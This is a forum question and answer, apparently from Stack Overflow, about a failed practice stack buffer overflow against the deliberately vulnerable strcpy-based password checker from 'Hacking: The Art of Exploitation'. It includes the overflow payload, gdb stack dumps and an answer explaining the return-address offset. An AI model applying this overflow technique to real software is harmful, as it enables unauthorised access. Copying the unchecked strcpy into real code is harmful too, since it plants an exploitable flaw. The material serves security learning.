# Instruction Overwrites with Garbage?

Tags: c, x86, overwrite, exploit, instructions

I am practicing a function return address overwriting exploit.  However, the program instruction pointer instead gets overwritten by gibberish.  I have tried compiling with `-fno-builtin` and  `-fno-stack-protector`, but nothing seems to change the behavior.

Code (from "Hacking the Art of Exploitation", 2nd Edition, Page 125):

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
        char password_buffer[16];
        int auth_flag = 0;

        strcpy(password_buffer, password);

        if(strcmp(password_buffer, "brillig") == 0)
                auth_flag = 1;
        if(strcmp(password_buffer, "outgrabe") == 0)
                auth_flag = 1;

        return auth_flag;
}

int main(int argc, char *argv[]) {
        if(argc < 2) {
                printf("Usage: %s <password>\n", argv[0]);
                exit(0);
        }
        if(check_authentication(argv[1])) {
                printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
                printf("      Access Granted.\n");
                printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
        } else {
                printf("\nAccess Denied.\n");
   }
}
```

Running in the debugger:

```
run $(perl -e 'print "\x97\x62\x55\x56"x8')
```

This address is to come in at the start of "Access Granted".  See below disassembly at `0x56556297 <+82>:    add    esp,0x4`:

```
   0x5655627e <+57>:    push   eax
   0x5655627f <+58>:    call   0x565561d9 <check_authentication>
   0x56556284 <+63>:    add    esp,0x4
   0x56556287 <+66>:    test   eax,eax
   0x56556289 <+68>:    je     0x565562ba <main+117>
   0x5655628b <+70>:    lea    eax,[ebx-0x1fd1]
   0x56556291 <+76>:    push   eax
   0x56556292 <+77>:    call   0x56556060 <puts@plt>
   0x56556297 <+82>:    add    esp,0x4
   0x5655629a <+85>:    lea    eax,[ebx-0x1fb4]
   0x565562a0 <+91>:    push   eax
   0x565562a1 <+92>:    call   0x56556060 <puts@plt>
   0x565562a6 <+97>:    add    esp,0x4
   0x565562a9 <+100>:   lea    eax,[ebx-0x1f9e]
   0x565562af <+106>:   push   eax
   0x565562b0 <+107>:   call   0x56556060 <puts@plt>
```

Stack before string copy:

```
(gdb) next
9       strcpy(password_buffer, password);
(gdb) x/12x $esp
0xffffd190: 0x00000002  0xffffd264  0xffffd270  0x565562fd
0xffffd1a0: 0x00000000  0x56559000  0xffffd1b8  0x56556284
0xffffd1b0: 0xffffd429  0x00000000  0x00000000  0xf7dd6e46
(gdb)
```

Stack after string copy:

```
(gdb) next
11      if(strcmp(password_buffer, "brillig") == 0)
(gdb) x/12x $esp
0xffffd190: 0x56556297  0x56556297  0x56556297  0x56556297
0xffffd1a0: 0x56556297  0x56556297  0x56556297  0x56556297
0xffffd1b0: 0xffffd400  0x00000000  0x00000000  0xf7dd6e46
(gdb)
```

... and the crash with backtrace and value of instruction pointer.

```
(gdb) cont
Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0xfdabe850 in ?? ()
    (gdb) bt
    #0  0xfdabe850 in ?? ()
    #1  0x565562a6 in main (argc=-1159180033, argv=0x83fffffd)
        at auth_overflow2.c:26
    Backtrace stopped: previous frame inner to this frame (corrupt stack?)
    (gdb) i r $eip
    eip            0xfdabe850          0xfdabe850
    (gdb)
```

Where does this value of "eip" come from?  Is there some advanced Linux protection I did not (or cannot) turn off?

I am running on:

```
tester@Test:/$ uname -a
Linux Test 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux
```

Comment: Single-step the code in your debugger (`si` command, try `display/i $eip` first) and see how you got to that point.

Answer (score 0):

I did it on a 64bit system. Here is [check_authentication disassebly](https://i.stack.imgur.com/RUP4h.png) , you can  here that function allocates 32 bytes of space for stack [ **sub rsp,0x20** ] where all of the variables are stored , and after that you need additional 8 bytes of memory for you **rip** . So in order to overwrite your instruction pointer you need to first fill the initial 32 bytes and then give the address of the place that you want to go to
[See here](https://i.stack.imgur.com/4rB9T.png) precisely two **'A'** have been inserted in rip. BTW if you are learning then i would suggest you to use [TCC](https://bellard.org/tcc/) , it creates very simple output which you can easily understand in assembly.